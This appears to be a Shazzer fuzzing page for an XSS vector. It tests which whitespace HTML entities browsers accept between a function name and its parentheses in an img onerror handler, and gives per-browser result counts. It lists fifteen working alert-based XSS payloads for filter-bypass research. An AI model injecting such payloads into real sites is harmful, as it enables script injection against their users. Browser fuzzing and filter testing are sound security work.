Entities allowed between function calls
8
4
2
This vector uses Shazzer's new features to check which entities are allowed between a function call using images. The results are a bit inconsistent yet because I currently wait for page load.
Created by: hackvertor
Created on: Saturday, June 29, 2024 at 1:55:26 PM
Updated on: Friday, December 6, 2024 at 9:56:55 PM
Vector type: XSS
Vector charset: UTF-8
Template used:
<img src=data: onerror="log$[data1]('html($[data1])')">
Your browser was detected as:
Detecting... Detecting... Detecting... Detecting...
Sample payloads
<img src=data: onerror="alert ('&ThinSpace;')">
<img src=data: onerror="alert ('&puncsp;')">
<img src=data: onerror="alert ('&MediumSpace;')">
<img src=data: onerror="alert ('&thinsp;')">
<img src=data: onerror="alert ('&hairsp;')">
<img src=data: onerror="alert ('&emsp;')">
<img src=data: onerror="alert ('&NonBreakingSpace;')">
<img src=data: onerror="alert
('&NewLine;')">
<img src=data: onerror="alert ('&emsp13;')">
<img src=data: onerror="alert ('&emsp14;')">
<img src=data: onerror="alert ('&ensp;')">
<img src=data: onerror="alert	('&Tab;')">
<img src=data: onerror="alert ('&nbsp;')">
<img src=data: onerror="alert ('&numsp;')">
<img src=data: onerror="alert ('&VeryThinSpace;')">
Fuzz results
Chrome 126.0.0.0 desktop macOS 10.15.7
Updated
Sat Jun 29 2024
Found 8 results
Loading...
Firefox 127.0 desktop macOS 10.15
Updated
Sat Jun 29 2024
Found 4 results
Loading...
Safari 17.4 desktop macOS 10.15.7
Updated
Sat Jun 29 2024
Found 2 results
Loading...
Safari 17.5 mobile iOS 17.5.1
Updated
Sun Jun 30 2024
Found 6 results
Loading...